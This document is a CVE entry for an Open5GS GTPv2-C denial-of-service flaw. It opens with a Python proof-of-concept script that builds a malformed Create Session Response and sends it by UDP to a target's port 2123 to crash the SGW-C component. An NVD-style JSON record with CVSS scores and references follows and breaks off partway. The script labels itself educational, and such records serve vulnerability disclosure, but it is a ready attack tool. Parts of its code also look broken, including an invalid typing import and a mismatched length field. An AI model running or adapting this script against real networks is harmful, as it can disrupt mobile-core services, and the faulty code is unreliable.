CVE-2025-15419

#!/usr/bin/env python3 """ CVE-2025-15419 PoC - Open5GS GTPv2-C DoS Note: This is a conceptual PoC for educational purposes only. Actual exploitation requires GTPv2-C protocol knowledge and Open5GS internals. """ import socket import struct from typing import bytes def build_gtpv2c_create_session_response(teid: int, sequence: int) -> bytes: """ Build a malicious GTPv2-C Create Session Response message that triggers the vulnerability in sgwc_s5c_handle_create_session_response """ # GTPv2-C Header version = 0x2 << 5 # Version 2 flags = 0x30 # TEID present, no piggybacking message_type = 0x36 # Create Session Response # Message header header = bytearray([ version | flags, message_type, 0x00, 0x00, # Length (to be filled) (teid >> 24) & 0xFF, (teid >> 16) & 0xFF, (teid >> 8) & 0xFF, teid & 0xFF, (sequence >> 16) & 0xFF, (sequence >> 8) & 0xFF, sequence & 0xFF, 0xFF # spare ]) # IE: Cause (mandatory) cause_ie = bytearray([ 0x02, 0x00, # IE Type: Cause 0x00, 0x06, # Length 0x00, # Spare + T (triggering message) 0x10, # Cause: Request accepted 0x00, 0x00 # Spare ]) # IE: F-TEID (with crafted data to trigger vulnerability) fteid_ie = bytearray([ 0x00, 0x01, # IE Type: F-TEID 0x00, 0x0A, # Length 0x80, # Flags 0x00, 0x00, 0x00, 0x01, # TEID 0x00, # IPv4 address (incomplete) 0x00, 0x00 # Interface type ]) payload = cause_ie + fteid_ie # Update length in header (header without first 4 bytes) length = len(payload) header[2] = (length >> 8) & 0xFF header[3] = length & 0xFF return bytes(header) + bytes(payload) def send_malicious_packet(target_ip: str, target_port: int, teid: int): """ Send malicious GTPv2-C packet to trigger DoS """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) sequence = 0x123456 packet = build_gtpv2c_create_session_response(teid, sequence) try: sock.sendto(packet, (target_ip, target_port)) print(f"[+] Malicious packet sent to {target_ip}:{target_port}") print(f"[+] TEID: {hex(teid)}, Sequence: {hex(sequence)}") except Exception as e: print(f"[-] Error sending packet: {e}") finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <teid>") sys.exit(1) target_ip = sys.argv[1] teid = int(sys.argv[2], 0) target_port = 2123 # Default GTPv2-C control plane port send_malicious_packet(target_ip, target_port, teid)

{"cve": {"id": "CVE-2025-15419", "sourceIdentifier": "[email protected]", "published": "2026-01-02T01:15:50.053", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. Executing a manipulation can lead to denial of service. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. This patch is called 5aaa09907e7b9e0a326265a5f08d56f54280b5f2. It is advisable to implement a patch to correct this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224#issue-3766767406", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4224#issuecomment-3698521008", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.339341", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.c ... (truncated)